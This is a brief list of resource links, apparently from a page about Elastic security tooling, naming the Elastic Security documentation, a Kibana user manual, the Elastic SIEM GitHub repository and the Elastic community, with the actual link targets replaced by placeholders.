• Elastic Security Documentation
• (__LINK_5___)
• Kibana Benutzerhandbuch
• [Elastic SIEM GitHub Repository](_LINK_5___
• [Elastic Community](_LINK_5___